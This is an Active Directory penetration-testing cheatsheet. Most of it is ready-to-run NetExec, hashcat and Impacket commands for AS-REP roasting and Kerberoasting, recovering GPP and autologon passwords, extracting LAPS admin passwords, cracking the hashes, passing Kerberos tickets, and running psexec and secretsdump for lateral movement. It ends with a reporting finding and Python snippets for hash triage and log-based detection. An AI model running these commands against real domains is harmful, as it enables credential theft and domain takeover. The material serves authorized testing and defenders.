🛡️ Methodology Checklist
- Add DC FQDN to /etc/hosts (required for LDAP/Kerberos)
- LDAP enum: nxc ldap [DC_FQDN] -u [USER] -p [PASS] --users
- ASREPRoast (authenticated): nxc ldap [DC_FQDN] -u [USER] -p [PASS] --asreproast hashes.txt
- ASREPRoast (unauthenticated, needs a username list): nxc ldap [DC_FQDN] -u users.txt -p '' --asreproast hashes.txt
- Kerberoast: nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb.txt
- GPP password: nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password
- LAPS (ldap module, run against the DC as in the cheatsheet below): nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M laps
- Crack Kerberoast: hashcat -m 13100 kerb.txt [wordlist]
🎯 Operational Context
Use when: Domain creds available — enumerate AD via LDAP and test Kerberos authentication with nxc.
Think Dumber First: nxc ldap [DC] -u [USER] -p [PASS] -M get-desc-users and nxc ldap [DC] -u [USER] -p [PASS] --asreproast asrep.txt — description field often contains passwords and AS-REP roasting takes 5 seconds.
Skip when: No domain creds — null/anonymous LDAP bind required first.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| nxc ldap [DC_FQDN] -u [USER] -p [PASS] --get-sid | Retrieve Domain SID |
| nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M get-network -o ALL=true | Enumerate internal DNS records from AD Integrated DNS |
| nxc ldap [DC_FQDN] -u [USER_FILE] -p '' --asreproast asrep_hashes.txt | ASREPRoast without creds (requires valid usernames) |
| nxc ldap [DC_FQDN] -u [USER] -p [PASS] --asreproast asrep_hashes.txt | ASREPRoast all eligible accounts (authenticated) |
| nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb_hashes.txt | Kerberoast all SPN accounts → TGS hashes to file |
| nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M user-desc -o ADD_KEYWORDS=ip,vpn,pass | Search AD user descriptions for credentials |
| nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password | Find credentials in Group Policy Preferences |
| nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_autologin | Find autologon credentials in GPO Registry.xml |
| nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M laps | Extract LAPS managed admin passwords |
| hashcat -a 0 -m 18200 asrep_hashes.txt rockyou.txt | Crack ASREPRoast hashes |
| hashcat -a 0 -m 13100 kerb_hashes.txt rockyou.txt | Crack Kerberoast TGS hashes |
| impacket-getTGT [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] | Request a TGT from Linux → writes [USER].ccache |
| export KRB5CCNAME=[TICKET_PATH] && nxc smb [TARGET_IP] --use-kcache | Authenticate using a .ccache Kerberos ticket |
| nxc smb [TARGET_IP] -u [USER] --aesKey [AES_KEY] | Authenticate with captured AES-256 Kerberos key |
🔬 Deep Dive & Workflow

LDAP Enumeration (Requires Valid Domain Account)
# Basic LDAP connection test
nxc ldap [DC_FQDN] -u [USER] -p [PASS]
# → Must use FQDN (not IP) for LDAP/Kerberos — add to /etc/hosts
# Domain SID
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --get-sid
# → S-1-5-21-[DOMAIN-SID]
# Internal DNS enumeration — map internal network
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M get-network -o ALL=true
# → Lists A records from AD-integrated DNS zone
# → Finds hosts not visible via subnet scan

ASREPRoasting with NetExec
# Unauthenticated (requires list of valid usernames)
nxc ldap [DC_FQDN] -u users.txt -p '' --asreproast asrep_out.txt
# → Tests each username; if "Do not require Kerberos preauthentication" is set → dumps the AS-REP hash for offline cracking
# Authenticated (finds ALL eligible accounts automatically)
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --asreproast asrep_out.txt
# Crack offline
hashcat -a 0 -m 18200 asrep_out.txt /usr/share/wordlists/rockyou.txt
# → Hash format: $krb5asrep$23$...

Kerberoasting with NetExec
# Find and dump all SPN accounts
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb_out.txt
# → Requests TGS for each SPN account → offline crackable
# Crack offline
hashcat -a 0 -m 13100 kerb_out.txt /usr/share/wordlists/rockyou.txt --force
# → Hash format: $krb5tgs$23$*...*
# See also: AD_Kerberoasting.md for targeted methods and OPSEC
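The two hash lines above ($krb5asrep$23$ from --asreproast, $krb5tgs$23$ from --kerberoasting) have fixed layouts. As an added example, not code from the page or from NetExec, this parses a dump into account, realm, SPN and hashcat mode and turns it into a remediation list for the account owners; it also accepts impacket's AES service-ticket layout. The sample lines are constructed (the hex is filler), and the '~' standing in for ':' inside SPNs follows the impacket-derived hashcat writer.

```python
import re

# hashcat modes for the layouts this page shows (etype 23 = RC4-HMAC) and for
# impacket's AES service-ticket layout; anything else gets hashcat_mode None
HASHCAT_MODES = {("asrep", 23): 18200, ("tgs", 23): 13100,
                 ("tgs", 17): 19600, ("tgs", 18): 19700}
HEX = r"[0-9a-fA-F]+"
PATTERNS = [
    # $krb5asrep$23$user@DOMAIN:checksum$encdata      (--asreproast output, mode 18200)
    ("asrep", re.compile(rf"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<domain>[^:]+):(?P<cksum>{HEX})\$(?P<edata>{HEX})$")),
    # $krb5tgs$23$*user$DOMAIN$spn*$checksum$encdata  (--kerberoasting output, mode 13100)
    ("tgs", re.compile(rf"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<domain>[^$]+)\$(?P<spn>[^*]+)\*\$(?P<cksum>{HEX})\$(?P<edata>{HEX})$")),
    # $krb5tgs$18$user$DOMAIN$*spn*$checksum$encdata  (AES tickets, modes 19600/19700)
    ("tgs", re.compile(rf"^\$krb5tgs\$(?P<etype>\d+)\$(?P<user>[^$*]+)\$(?P<domain>[^$*]+)\$\*(?P<spn>[^*]+)\*\$(?P<cksum>{HEX})\$(?P<edata>{HEX})$")),
]

# Constructed sample dump: the layouts are real, the checksum/cipher hex is filler
SAMPLE_DUMP = [
    "$krb5asrep$23$svc_backup@CORP.LOCAL:0123456789abcdef0123456789abcdef$deadbeef00",
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/db01.corp.local~1433*$00112233445566778899aabbccddeeff$cafebabe00",
    "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$00112233445566778899aabbccddeeff$cafebabe00",
    "[*] not a hash line, e.g. tool banner output",
]

def parse_kerberos_hash(line):
    """Describe one hashcat-format line; None if the line is not one."""
    line = line.strip()
    for kind, pat in PATTERNS:
        m = pat.match(line)
        if not m:
            continue
        etype = int(m.group("etype"))
        spn = m.groupdict().get("spn")
        return {
            "kind": kind, "etype": etype,
            "user": m.group("user"), "domain": m.group("domain").upper(),
            # the impacket-derived writer stores ':' in the SPN as '~'; undo that
            "spn": spn.replace("~", ":") if spn else None,
            "hashcat_mode": HASHCAT_MODES.get((kind, etype)),
        }
    return None

def triage(lines):
    """Map each exposed account to the control that removes the exposure."""
    out = []
    for rec in filter(None, map(parse_kerberos_hash, lines)):
        if rec["kind"] == "asrep":
            fix = "re-enable Kerberos pre-authentication"
        elif rec["etype"] == 23:
            fix = f"rotate to a long random password or gMSA; SPN {rec['spn']} issued RC4 tickets"
        else:
            fix = f"rotate if password is weak; SPN {rec['spn']} issued AES tickets"
        out.append((f"{rec['domain']}\\{rec['user']}", fix))
    return out
```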

Credential Hunting via LDAP Modules
# User descriptions (admins sometimes store passwords here)
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M user-desc
# → Default keywords: pass, password, temp, admin
# → Add custom keywords:
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M user-desc -o ADD_KEYWORDS=ip,vpn,cred,secret
# GPP passwords (old Group Policy Preferences — pre-2014)
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password
# → Finds cpassword in SYSVOL → decrypts with the publicly known AES key (MS14-025)
# GPP autologin credentials
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_autologin
# → Checks GPO Registry.xml files for stored AutoAdminLogon credentials

LAPS Password Extraction
# Extract LAPS managed local admin passwords
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M laps
# → Requires: target computer's LAPS attribute readable by current user
# → Often readable by: computer's owner, specific delegated groups
# → Output: Computer name → LAPS password (rotated local admin)
# → Use for lateral movement to that specific machine

Kerberos Ticket Authentication
# Use .ccache ticket (from pass-the-ticket / impacket)
export KRB5CCNAME=/tmp/admin.ccache
nxc smb [TARGET_IP] --use-kcache
# Add DC FQDN to /etc/hosts (REQUIRED for Kerberos)
echo "[DC_IP] [DC_FQDN]" >> /etc/hosts
# AES key authentication (from Mimikatz sekurlsa::ekeys)
nxc smb [TARGET_IP] -u [USER] --aesKey [256_BIT_AES_KEY]

Linux: Request TGT and Use .ccache
# 0. Kerberos needs the DC FQDN to resolve and time within 5 min skew
echo "[DC_IP] [DC_FQDN] [DOMAIN]" >> /etc/hosts
sudo ntpdate [DC_IP] # or: sudo rdate -n [DC_IP]
# → Clock skew > 5 min → KRB_AP_ERR_SKEW
# 1. Request a TGT with Impacket → writes [USER].ccache to CWD
impacket-getTGT [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP]
# → With a hash: impacket-getTGT [DOMAIN]/[USER] -hashes :[NT_HASH] -dc-ip [DC_IP]
# → With AES key: impacket-getTGT [DOMAIN]/[USER] -aesKey [AES_KEY] -dc-ip [DC_IP]
# → Output: "Saving ticket in [USER].ccache"
# 2. Export the ticket so Kerberos-aware tools find it
export KRB5CCNAME=$(realpath [USER].ccache)
klist # → confirm TGT present + expiry (krbtgt principal)
# 3. Use the ticket — no password needed (-k / --use-kcache / -no-pass)
nxc smb [TARGET_FQDN] --use-kcache
impacket-psexec -k -no-pass [DOMAIN]/[USER]@[TARGET_FQDN]
impacket-secretsdump -k -no-pass [DOMAIN]/[USER]@[TARGET_FQDN]
# → Always target the FQDN, not the IP — Kerberos validates the SPN host

🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc ldap fails with port error | Default LDAP port issue | Specify: nxc ldap [DC] -u [USER] -p [PASS] --port 389 |
| LDAPS required | LDAP signing enforced | Add --use-ldaps flag; port 636 |
| ASREPRoast module returns nothing | No accounts without preauth | Check manually: impacket-GetNPUsers -usersfile users.txt -no-pass [DOMAIN]/ |
| get-desc-users returns empty | No descriptions set | Try: nxc ldap [DC] -u [USER] -p [PASS] -M ldap-checker for broader enumeration |
| Kerberos test fails | Clock skew | Sync time with DC before Kerberos operations |
📝 Reporting Trigger
Finding Title: LDAP Enumeration via NetExec Yields Sensitive AD Data
Impact: LDAP queries with standard domain credentials expose user descriptions containing passwords, AS-REP roastable accounts, and sensitive AD configuration data, accelerating privilege escalation without additional exploitation.
Root Cause: Sensitive information stored in AD user description fields visible to all authenticated users. LDAP read access not restricted based on data sensitivity.
Recommendation: Audit and remove sensitive information from AD user description fields. Enable AD auditing for bulk LDAP reads. Implement LDAP query restrictions for sensitive attributes. Deploy Microsoft Defender for Identity to detect reconnaissance via LDAP.
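The recommendation above asks for auditing on the DC side. As an added example that is not from the page, this runs the two Domain Controller Security-log checks that match the roasting steps in the deep dive over constructed sample records: 4768 with Pre-Authentication Type 0 (what --asreproast harvests) and a burst of 4769 RC4 (0x17) service-ticket requests from one client (what --kerberoasting produces). The record field names mirror the standard Windows event fields; the hosts, names, times and thresholds are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like Windows Security events 4768 (TGT request)
# and 4769 (service ticket request); hosts, names and times are made up.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:01", "id": 4768, "account": "svc_backup", "client": "10.0.0.50",
     "preauth_type": 0, "etype": "0x17"},
    {"time": "2024-05-01T09:00:02", "id": 4768, "account": "jdoe", "client": "10.0.0.51",
     "preauth_type": 2, "etype": "0x12"},
    {"time": "2024-05-01T09:05:00", "id": 4769, "account": "jdoe", "client": "10.0.0.50",
     "service": "MSSQLSvc/db01.corp.local:1433", "etype": "0x17"},
    {"time": "2024-05-01T09:05:01", "id": 4769, "account": "jdoe", "client": "10.0.0.50",
     "service": "HTTP/web01.corp.local", "etype": "0x17"},
    {"time": "2024-05-01T09:05:02", "id": 4769, "account": "jdoe", "client": "10.0.0.50",
     "service": "CIFS/fs01.corp.local", "etype": "0x17"},
    {"time": "2024-05-01T09:30:00", "id": 4769, "account": "asmith", "client": "10.0.0.60",
     "service": "CIFS/fs01.corp.local", "etype": "0x12"},
]

def detect_asrep_roast(events):
    """4768 with Pre-Authentication Type 0: the DC issued an AS-REP without pre-auth,
    which is exactly what --asreproast collects. Returns (account, client) pairs."""
    return [(e["account"], e["client"]) for e in events
            if e["id"] == 4768 and e.get("preauth_type") == 0]

def detect_kerberoast(events, min_spns=3, window=timedelta(minutes=5)):
    """4769 burst: one client pulling RC4 (0x17) service tickets for many distinct SPNs
    inside `window` is the shape of --kerberoasting. Returns [(client, sorted SPNs)].
    Caveat: domains that still default to RC4 need a higher min_spns to stay quiet."""
    by_client = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["etype"] == "0x17":
            by_client[e["client"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    hits = []
    for client, reqs in by_client.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # slide a window over this client's requests
            spns = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(spns) >= min_spns:
                hits.append((client, sorted(spns)))
                break
    return hits

if __name__ == "__main__":
    for account, client in detect_asrep_roast(SAMPLE_EVENTS):
        print(f"AS-REP roast candidate: {account} requested from {client} without pre-auth")
    for client, spns in detect_kerberoast(SAMPLE_EVENTS):
        print(f"Kerberoast burst from {client}: {len(spns)} RC4 TGS requests -> {spns}")
```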